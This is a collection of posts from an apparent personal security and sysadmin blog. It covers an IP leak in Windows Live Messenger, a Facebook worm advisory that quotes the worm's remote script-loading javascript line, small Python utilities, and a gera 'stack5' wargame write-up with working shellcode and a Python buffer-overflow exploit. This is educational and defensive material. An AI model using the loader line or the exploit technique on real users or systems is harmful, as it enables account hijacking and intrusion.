Today, while I was working on my pet honeypot project, I found out that it also leaks users’ public IP addresses when they exchange links during their conversations.

So, let’s say you type in www.example.com/something/test.php and press Enter to send it to your conversation partner. The moment you do that, WLM without any warning will open a connection to the aforementioned host and send a HEAD HTTP request, thous exposing your public IP address.

HEAD /test/something.php HTTP/1.1
User-Agent: Windows-Live-Social-Object-Extractor-Engine/1.0
Host: www.example.com
Content-Length: 0
Cache-Control: no-cache

Someone could say “So? What’s the big deal?”. Sure, if you’re exchanging links to YouTube and Facebook, it’s not a big deal -probably no one gives a fuck for the videos you’re watching or the people you’re stalking. On the other hand, things like that might expose your identity, if let’s say, you browse a host through a darknet like TOR or I2P, and decide (without giving it much thought) to share a link to that host through Windows Live Messenger.

…Of course there are not many chances that you’re using TOR/I2P while using WLM for your instant messaging. 

We are aware of a possible compromise of PHP.NET server(s) and a potential PHP source backdoor. “wiki.php.net” was taken offline

–VUPEN Security

Before I continue, I want to make clear that I don’t have any information regarding the compromise, neither can I state that PHP source code was or wasn’t backdoored, since I have not inspected the code, neither have I reviewed the revision log and the changes committed to PHP source tree. This information is publicly available at http://svn.php.net.

What I can state, though, is that showing this screenshot…

…and claiming that “The picture shows that php.net site was compromised, and hacker backdoored php source” is 100% BULLSHIT.

Anyone with some basic understanding of code can tell you that a modification of a single line of code in the section which shows information about the PHP Group, is obviously NOT a backdoor.

Please, stop spreading things such as “Php.net was compromised, and php source backdoored !” as a fact, when your only “evidence” is the screenshot above.

What is outrageous though, is that I see respected users who post about infosec and have hundreds of followers, spreading this kind of misinformation and they don’t even seem to be joking.

Stop blowing things out of proportion.

[UPDATE]
PHP team announced officially today that their wiki was compromised. Though, after an extensive code inspection, there were no traces of backdoors. Case closed.

Hijacking Sessions and Injecting Code at OSI Layers 2,3 & 4

You can grab the script from here.

/*
A little GreaseMonkey script for Twitter, which replaces GIF avatars
with the Twitter's default avatar in your timeline.

Karagasidis Dimitris, http://gatoni.gr
*/

// ==UserScript==
// @name          Twitter GIF Avatar Blocker
// @namespace     http://gatoni.gr
// @description   A script which substitutes GIF avatars with the Twitter's default avatar
// @include       http://twitter.com/*
// ==/UserScript==

function eliminate_gifs() {
    var avatars = document.getElementsByTagName("img");
    for ( var i in avatars ) {
        // Check if the image is an avatar in the timeline
        if ( avatars[i].className == "user-profile-link" || avatars[i].className == "photo fn" ) {
            // Substitute the animated avatar with the Twitter's default avatar
            if ( avatars[i].src.substr(-3).toLowerCase() == "gif" ) {
                avatars[i].src = "http://a1.twimg.com/sticky/default_profile_images/default_profile_0_normal.png";
            };
         };
    };
};
eliminate_gifs();
setInterval( eliminate_gifs, 3000 );

You can read the de-obfuscated and fully documented code here.

This is the URLs distributing the malware:

• http://fbcreeper.info/
• http://procreeper.info/
• http://profilechecker.info/
• http://thefbcreeper.info/

This is what this malware does:

• Posts links on victim’s wall, which advertise the malware
• Posts links to victim’s contacts’ walls, which advertise the malware
• Posts links to pages created or administered by victim, which advertise
  the malware
• Adds users with emails lethaburbach890@yahoo.com and chunfeezellwytm@hotmail.com as administrators to the pages created by the victim.
• Sends private messages, advertising the malware
• “Likes” pages “DJ-Emphatic” and “OH Whutt” with victim’s account
• Invites all contacts to an event (which seems to be removed now)
• Sends user to http://fbviews.org/result.php, where the user is asked to do some “anti-spam verification tests” before he can view the results. Of course there are no results, and the malware developers earn money from bringing traffic to the sites mentined there.

As of now (22nd February 2011, 23:40 GMT+2), somewhere between 11,000 and 20,000 accounts are infected.

The malware is injected through a javascript code snippet:

javascript: (a = (d = document).createElement("script")).src = "http://fbcreeper.info/StalkerTools.fb";void(d.body.appendChild(a))

Do NOT inject and execute unknown code in your browser address bar. If you happened to use this application/malware, check your pages’ administrators, log-out from your Facebook account, clear browsing history and remove any links left on your wall and your pages.

I decided to set up ddclient on one of my boxes to solve this problem. I installed it, but I really didn’t feel like reading the whole ddclient.conf file in order to configure it, so I decided to write my own client. It’s not rocket science, you just make requests to No-IP™ update servers with your credentials, your current ip and the domain name you want to associate with it.

After I wrote it, I decided to convert it into a Python class and upload it here, in case anyone finds it useful.

The usage is pretty simple:

#!/usr/bin/env python
from noipclient import NoIPClient

client = NoIPClient( "your-username", "your-password", "your-domain" )

By default, the class will update No-IP™ servers every 300 seconds. You can change that with set_interval() method:

...
# Update No-IP servers every 10 minutes
client.set_interval(600)

Also, by default the class logs all messages in a log file which is located in the same directory with the script. You can change that with set_logfile() method:

...
# Log all messages to /var/log/noipclient.log
client.set_logfile( "/var/log/noipclient.log" )

Just make sure you have enough permissions in the directory that you want to store the log file.

To start the updating procedure, use the start() method:

...
client.start()

That’s pretty much all. Here’s the code:

#!/usr/bin/env python2.5

# Copyright 2011 Karagasidis Dimitris. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification, are
# permitted provided that the following conditions are met:
#
#    1. Redistributions of source code must retain the above copyright notice, this list of
#       conditions and the following disclaimer.
#
#    2. Redistributions in binary form must reproduce the above copyright notice, this list
#       of conditions and the following disclaimer in the documentation and/or other materials
#       provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY KARAGASIDIS DIMITRIS ``AS IS'' AND ANY EXPRESS OR IMPLIED
# WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
# FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL KARAGASIDIS DIMITRIS OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
# ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# The views and conclusions contained in the software and documentation are those of the
# authors and should not be interpreted as representing official policies, either expressed
# or implied, of Karagasidis Dimitris.

# Simple client for NoIP Dynamic DNS provider
# More info can be found here: http://www.no-ip.com/integrate/

import urllib2, re, logging, time

class NoIPClient:
  _update_url = "https://dynupdate.no-ip.com/nic/update"
  _logfile = "noipclient.log"
  _interval = 300
  _domain_name = ""
  _current_ip = ""

  def __init__( self, username, password, domain_name ):
    self._domain_name = domain_name
    password_manager = urllib2.HTTPPasswordMgrWithDefaultRealm()
    password_manager.add_password( None, self._update_url, username, password )
    authentication_handler = urllib2.HTTPBasicAuthHandler( password_manager )
    opener = urllib2.build_opener( authentication_handler )
    urllib2.install_opener( opener )

  def _get_url_data( self, url ):
    handler = urllib2.urlopen( url )
    data = handler.readlines()
    handler.close()
    return data

  def _check_ip( self ):
    ip_regex = "[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}"
    worldip_data = self._get_url_data( "http://api.wipmania.com" )[0]
    ip = re.findall( ip_regex, worldip_data )
    if len( ip ) == 0:
      self._current_ip = ""
      logging.warning( "Could not resolve current ip." )
      return False
    self._current_ip = ip[0]
    logging.info( "Current ip resolved: %s" % ip[0] )
    return True

  def _update( self ):
    if self._check_ip():
      res = self._get_url_data( "%s?hostname=%s&myip=%s" % ( self._update_url, self._domain_name, self._current_ip ) )[0]
      if res.find( "good" ) != -1:
        logging.info( "DNS hostname update successful" )
      if res.find( "nochg" ) != -1:
        logging.info( "IP address is current, no update performed" )
      if res.find( "nohost" ) != -1:
        logging.error( "Hostname supplied does not exist under specified account" )
      if res.find( "badauth" ) != -1:
        logging.error( "Invalid username password combination" )
      if res.find( "badagent" ) != -1:
        logging.error( "Disabling client" )
        exit()
      if res.find( "!donator" ) != -1:
        logging.error( "An update request was sent including a feature that is not available" )
      if res.find( "abuse" ) != -1:
        logging.error( "Username is blocked due to abuse. Terminating" )
        exit()
      if res.find( "911" ) != -1:
        logging.error( "A fatal error on server side occured. Setting interval to 1800 seconds" )
        self._interval = 1800

  def _configure_logging( self ):
    logging.basicConfig(
      filename=self._logfile,
      level=logging.DEBUG,
      format="%(asctime)s\t%(levelname)s\t%(message)s",
      datefmt='%b %d %H:%M:%S'
    )

  def set_interval( self, seconds ):
    self._interval = seconds

  def set_logfile( self, filename ):
    self._logfile = filename
    self._configure_logging()

  def start( self ):
    self._configure_logging()
    while True:
      self._update()
      time.sleep( self._interval )

I use WorldIP’s API to find the current ip address. Seems to work out-of-the-box on Debian GNU/Linux and OpenBSD 4.8 with Python 2.5.

Enjoy

As I mentioned in one of my previous posts, I installed OpenBSD, so I’m spending these days configuring it according to my needs.

One of the things that annoyed me, is that the OpenBSD’s default package management system doesn’t have a utility for searching packages. Every time I was about to install a package, I had to search the web or look for it in my preferred mirror’s directory listing. So I decided to write a utility for that -since I like writing my own shit and it was something trivial to do.

There’s not much to say about it. It’s written in Python and uses the libraries that come with version 2.5 by default. It logs into the mirror you specified in PKG_PATH environmental variable, and searches in package names for the string you provided as command-line argument. Just get pkg_find.gz and put it somewhere in your path. That’s all.

root@puffy /home/gatoni/code $ gunzip pkg_find.gz
root@puffy /home/gatoni/code $ cp pkg_find /usr/local/bin/pkg_find
root@puffy /home/gatoni/code $ chmod +x /usr/local/bin/pkg_find
root@puffy /home/gatoni/code $ pkg_find apache
Found 6218 total packages at ftp://ftp.cc.uoc.gr/mirrors/OpenBSD/4.8/packages/i386/
Results(4):
        apache-ant-1.7.1p1.tgz
        apache-couchdb-0.10.1.tgz
        apache-httpd-2.2.15.tgz
        modsecurity-apache-1.9.3p3.tgz

The code is trivial as well…

#!/usr/bin/env python2.5

# Copyright 2011 Karagasidis Dimitris. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification, are
# permitted provided that the following conditions are met:
#
#    1. Redistributions of source code must retain the above copyright notice, this list of
#       conditions and the following disclaimer.
#
#    2. Redistributions in binary form must reproduce the above copyright notice, this list
#       of conditions and the following disclaimer in the documentation and/or other materials
#       provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY KARAGASIDIS DIMITRIS ``AS IS'' AND ANY EXPRESS OR IMPLIED
# WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
# FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL KARAGASIDIS DIMITRIS OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
# ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# The views and conclusions contained in the software and documentation are those of the
# authors and should not be interpreted as representing official policies, either expressed
# or implied, of Karagasidis Dimitris.

from urlparse import urlparse
from ftplib import FTP
from os import environ
from sys import argv

pkg_path = ""
matches = []
packages = 0
keyword = ""

def check_pkg( line ):
  global matches, packages, keyword
  package = line.split( " " )[-1]
  if not package.endswith( ".tgz" ):
    return
  if package.lower().find( keyword.lower() ) != -1:
    matches.append( package )
  packages += 1

def usage():
  print "Usage:\n%s \n" % argv[0]

if len( argv ) != 2:
  usage()
  exit()
keyword = argv[1]

try:
  pkg_path = environ[ "PKG_PATH" ]
except:
  print "PKG_PATH enviroment variable is not set."
  exit()

url_data = urlparse( pkg_path )
try:
  ftp = FTP( url_data[1] )
  ftp.login()
  ftp.cwd( url_data[2] )
  listing = ftp.retrlines( "LIST", check_pkg )
  ftp.close()
except:
  print "Error during package list retrieval."
  exit()

print "Found %d total packages at %s" % ( packages, pkg_path )
print "Results(%d):" % len(matches)
if len(matches):
  for p in matches:
    print "\t%s" % p
else:
  print "\tNone"

As I was writing this post, I realized that I should add support for multiple mirrors in PKG_PATH. I’ll update the code one of these days. There is at least one similar tool out there, but it does more than just searching for packages. I prefer keepin’ it simple so I wrote a script that does what it supposed to do -search for packages. Now that I think, it would be wise to remove the additional info and formatting, in case it ever needs to be piped with other applications.

Keep in mind that this utility has nothing to do with the official OpenBSD’s packet management system.

Enjoy.

Since I spend most of my time in GNU/Linux terminals, I found OpenBSD terminal pretty annoying -specifically, the fact that some keys (HOME, END, PAGE UP etc)  for some fucking reason don’t work. I tried to find a workaround by changing terminal types, but the problem persisted. I read somewhere that in graphical terminals this problem does not occur, so I installed Xorg and XFCE, just in case I need to do some longer-than-usual administration tasks which require lots of typing. And indeed, in graphical environment everything worked smooth…

…Until after few minutes later, when I realized that there were some rendering problems. It was like the surface wasn’t redrawn properly. When I clicked on icons or opened windows, my desktop was full of glitches, which were annoying as hell. I have an old ATI Radeon 7500 on that box, by the way.

I noticed that there was a shitload of options for radeon-based cards commented out in my xorg.conf, so I started reading the manual for ATI Radeon video driver which comes with OpenBSD, to find out what they were all about.

$ man radeon

After a while, I found something that sounded like the problem I had:

Option "DisplayPriority" "string"
    Used  to prevent flickering or tearing problem caused by display
    buffer underflow.
    AUTO   -- Driver calculated (default).
    BIOS   -- Remain unchanged from BIOS setting.
              Use this if the calculation is not correct
              for your card.
    HIGH   -- Force to the highest priority.
              Use this if you have problem with above options.
              This may affect performance slightly.
    The default value is AUTO.

I set “DisplayPriority” to “BIOS”, restarted X server, but it didn’t solve the problem. Then I set the option to “HIGH” and everything finally worked smooth.

To summarize: In case your graphical environment under OpenBSD looks fucked up and you happen to have a radeon-based GPU, try changing the “DisplayPriority” option, from “AUTO” (which is the default value) to “BIOS” or “HIGH” -whatever works for you. You’ll probably end up having something like that:

Section "Device"
    # Lots of commented out options
    Identifier  "Card0"
    Driver      "radeon"
    VendorName  "ATI"
    BoardName   "Radeon 7500"
    BusID       "PCI:0:10:0"
    Option      "BusType" "PCI"
    Option      "DisplayPriority" "HIGH"
EndSection

I didn’t find much about this problem after a really quick web search, so I wrote about it. I hope it was helpful.

/* stack5.c                                     *
 * specially crafted to feed your brain by gera */

int main() {
	int cookie;
	char buf[80];

	printf("buf: %08x cookie: %08x\n", &buf, &cookie);
	gets(buf);

	if (cookie == 0x000a0d00)
		printf("you lose!\n");
}

Our task is to make this piece of code print “you win!” to the standard output.

Spoiler Alert: If you want to solve this exercise on your own, you should stop reading here.

We’re dealing with an interesting exercise here! We can’t just change the execution flow, as we did in Stack #4 exercise, because the only thing we’ll achieve is to get “you lose!” printed to the standard output. What we have to do is to exploit the code and add some extra functionality to it, in order to solve the challenge.

Let’s summarize what we already know from Stack #4 challenge, since the code is almost identical. We know that we can’t assign 0x000a0d00 to the cookie integer, since the value 0x0a is a line termination token and will make gets() stop reading user data. Also, we know that we have at least 84 bytes to store anything we want. Finally, we can alter the execution flow of the program, by overwriting the return address of the main() and jumping wherever we want in the scope of program’s address space. With all these things in mind, we can inject our own code which prints the desired message and then execute it.

Let’s start by writing a little program in assembly which prints out “you win!”:

.section .data
    msg:
        .ascii "you win!"
.section .text
.globl _start
    _start:
        movl $4, %eax      # sys_write system call
        movl $1, %ebx      # Output file descriptor (stdout)
        movl $msg, %ecx    # String to print
        movl $8, %edx      # Length of the string
        int $0x80          # Make system call
        movl $1, %eax      # sys_exit system call
        movl $0, %ebx      # return value (0)
        int $0x80          # Make system call

Awesome. We assemble it, link it and it works as expected. Now we must convert this program into a stream of bytes, so we can inject it though the standard input. Let’s use objdump for that:

gatoni@ExploitBox $ objdump -d win_code

win_code:     file format elf32-i386

Disassembly of section .text:

08048074 <_start>:
 8048074:       b8 04 00 00 00          mov    $0x4,%eax
 8048079:       bb 01 00 00 00          mov    $0x1,%ebx
 804807e:       b9 98 90 04 08          mov    $0x8049098,%ecx
 8048083:       ba 08 00 00 00          mov    $0x8,%edx
 8048088:       cd 80                   int    $0x80
 804808a:       b8 01 00 00 00          mov    $0x1,%eax
 804808f:       bb 00 00 00 00          mov    $0x0,%ebx
 8048094:       cd 80                   int    $0x80

Before we make the shellcode out of this information, let’s take a look at this instruction:

804807e:       b9 98 90 04 08          mov    $0x8049098,%ecx

As you can see, it loads an address out of it’s own memory space to the ECX register. Since we’ll inject this code into another application, it will work with the application’s memory space and not it’s own, so this won’t get us the result we want. What we must do is to also inject the string that we want to be printed, and load its address to that instruction. It’s pretty easy to find that address. Since we know the address of the buf array in which we’ll store our shellcode, and we know the length of our shellcode, we can inject the string right after our shellcode and its address will be the address of the buf plus the length of our shellcode.

Gera’s code informs us that the buf address is 0xbffffc8c and this will be the starting address of our injected code. Add 34 more bytes to that address, and you have 0xbffffcae. After this little modification, the instruction I mentioned above will look something like this:

804807e:       b9 ae fc ff bf          mov    $0xbffffcae,%ecx

It’s time to assemble the shellcode:

\xb8\x04\x00\x00\x00\xbb\x01\x00\x00\x00\xb9\xae\xfc\xff\xbf\xba\x08
\x00\x00\x00\xcd\x80\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80

The string that will follow the shellcode is a simple 8-byte long “you win!” literal.

From Stack #4 we also know that in order to reach main’s return address, we must write 96 bytes to the stack. We already have 42 bytes. What about the rest 54 bytes? It’ll be plain, old junk.

After we write the 96 bytes to the stack, we must write a 4-byte long return address which will make the program jump into executing our injected code. We already know the address -it’s the address of the buf array. So this is how will look the 100-byte input to Gera’s code.

[Shellcode - 34 bytes][String - 8 bytes][Junk - 54 bytes][Return address - 4 bytes]

Let’s put all these things in a little Python script:

#!/usr/bin/python
shell_code = "\xb8\x04\x00\x00\x00\xbb\x01\x00\x00\x00\xb9\xae\xfc\xff\xbf\xba\x08\x00\x00\x00\xcd\x80\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80"
win_string = "you win!"
some_junk = 54 * "\x90"
ret_addr = "\x8c\xfc\xff\xbf"
print shell_code + win_string + some_junk + ret_addr

Pipe it into Gera’s code and let the dopamine flow free

gatoni@ExploitBox $ ./exploit.py | ./stack5
buf: bffffc8c cookie: bffffcdc
you win!

Keep in mind that there’s no newline character after “you win!”. Also keep in mind that you can’t pass a string literal which is 10 characters long. To be exact, you can but when you’re specifying the length of the string in EDX register, it can’t be 10. Why? Remember ASCII 10 or 0x0A is the line termination token and if puts() detects it anywhere in its input, it’ll stop reading data which will result in exploitation failure.

That was an awesome challenge! It’s my favorite in the “Warming Up on Stack” series. I hope you enjoyed it as much as I did. I guess it’s time to move to other, more advanced Gera’s challenges.